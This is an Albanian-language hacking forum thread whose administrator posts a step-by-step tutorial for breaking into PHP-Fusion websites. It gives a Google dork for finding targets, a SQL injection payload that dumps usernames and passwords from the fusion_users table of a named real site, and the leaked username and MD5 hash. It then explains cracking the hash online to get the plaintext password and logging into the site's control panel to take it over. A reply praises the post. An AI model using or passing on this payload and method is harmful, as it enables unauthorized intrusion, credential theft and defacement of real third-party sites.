ForumCalendarPytėsoriKėrkoLista AnėtarėveGrupet e AnėtarėveRegjistrohuidentifikimi

Share | 
 

 Web hacking tuto

Shko poshtė 
AutoriMesazh
cRackeR-Bu.RiM
Administrator
Administrator
avatar

Numri i postimeve : 306
Registration date : 15/07/2008

MesazhTitulli: Web hacking tuto   Fri Jul 18, 2008 6:11 am

Hacking Web Site!

http://www.example.com

Shkojm e lypim ne google
0 .inurl:infusions/arcade/index.php

pastaj na dalin aty cilat weba mujm me i hacku..Pra nuk do me than ne gjdo web bon kjo...
p.sh une e mora qet web....


1. http://www.fordteam-hameln.de/phpfusion ... /index.php

2. /infusions/arcade/index.php?op=view_game_list&cid=-1/**/union/**/select/**/null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

pra ne i ja shtojm edhe codin dhe do te duket keshtu...
3. http://www.fordteam-hameln.de/phpfusion ... on_users/*

4. Dhe aty na dalin userat edhe passworda...


XxBLacKDeViLxX ( 0 )
92885d88b0354c0557bacbb1804bc4d71. USERI: XxBLacKDeViLxX

2 92885d88b0354c0557bacbb1804bc4d7 NDRSA KY ESHTE PASSWORDI..

3. 92885d88b0354c0557bacbb1804bc4d7 per ta gjetur kete password VEPROJM KĖSHTU..

1. http://www.passcracking.com
2. kur na hapet web faqja aty e shkruajm kete (md5 ose hash)
92885d88b0354c0557bacbb1804bc4d7 pass arschgesicht
dhe na del passwordi.. arschgesicht


*PASTAJ HYJM NE CP NE WEB SITE... EDHE QKA DOJM BOJM...
dhe website eshte hackuar...
http://www.fordteam-hameln.de/phpfusion SHIKOOOO ! ! !

Tung Kaloni Mire Ju Pershendes...

Copied!
Mbrapsht nė krye Shko poshtė
Shiko profilin e anėtarit http://al-crew.co.nr
Musafir
Vizitor
avatar


MesazhTitulli: Re: Web hacking tuto   Sat Jul 19, 2008 6:49 am

bravo b-cracker valla je tu perparuu thnxx
Mbrapsht nė krye Shko poshtė
 
Web hacking tuto
Mbrapsht nė krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: Hacking :: Tutoriales / Mesime-
Kėrce tek: